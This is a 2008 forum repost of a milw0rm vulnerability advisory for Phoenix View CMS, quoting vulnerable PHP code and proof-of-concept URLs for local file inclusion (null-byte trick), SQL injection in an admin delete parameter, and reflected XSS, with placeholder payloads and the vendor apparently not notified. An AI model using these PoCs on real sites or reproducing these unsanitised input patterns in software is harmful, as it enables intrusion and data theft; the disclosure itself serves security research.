Jump to content
tw8

[RST]Phoenix View CMS - Multiple Vulns [LFI][SQLI][XSS]

Recommended Posts

Posted

Link: http://milw0rm.com/exploits/5578

Multe multumiri lui kw3rln ... stie el de ce :P.

#########################################################################################

Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI]

[SQLI][XSS]
#########################################################################################

Found by : tw8
Date : 8.05.2008
Website && Forum : http://rstcenter.com && http://rstcenter.com/forum/
Bug type : LFI, SQLI & XSS
#########################################################################################

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Phoenix View CMS
Version : <= Pre Alpha2
Vendor : http://sourceforge.net/projects/phoenixviewcms/
Description :

Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using a
self-written Template-Engine. The CMS will use a self-written API and it's gonna be
easy to write your own plugins and modules.
########################################################################################

Vulnerabilities:
~~~~~~~~~~~~~~~

Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]:

----------------------------------------------------------------------------


if(isset($_GET["ltarget"])) {
$ltarget=$_GET["ltarget"];
$_SESSION["lastsecaction"]='';
}
......
if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) {
printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden.");
}
else {
include SYSTEM_ADMIN_path . $ltarget . ".php";
}


----------------------------------------------------------------------------

POC #1:

http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00

http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable code #2 admin/module/*.php

[SQLI]:

----------------------------------------------------------------------------


class db {

......

function query($query,$ressave=false) {
if($ressave) return mysql_query($query);
else {
$this->res = mysql_query($query);
return $this->res;
}
}
......
}
......

if(isset($_GET["del"])) {
$db->query("DELETE from " . SYSTEM_dbpref . "todo where id='".$_GET["del"]."'");
echo "<font color='green'>Löschen erfolgreich</font>
\n";
}

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/


----------------------------------------------------------------------------

POC #2:

http://www.target.com/path/admin/module/vulnerable_file.php?del=

[SQLI]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable code #3 admin/module/*.php [XSS]:

----------------------------------------------------------------------------


<input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"];else echo $_POST["conf"]; ?>' />

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/


----------------------------------------------------------------------------

POC #3:

http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Status:

~~~~~~~

Vendor has not been contacted yet.

###########################################################################

Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside, str0ke & all RST Members.

###########################################################################

Contact:

~~~~~~~

Website: http://rstcenter.com

Forum: http://rstcenter.com/forum

E-Mail: ym_tw8[at]yahoo[dot]com

################################ [ EOF ] ##################################

# milw0rm.com [2008-05-09]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...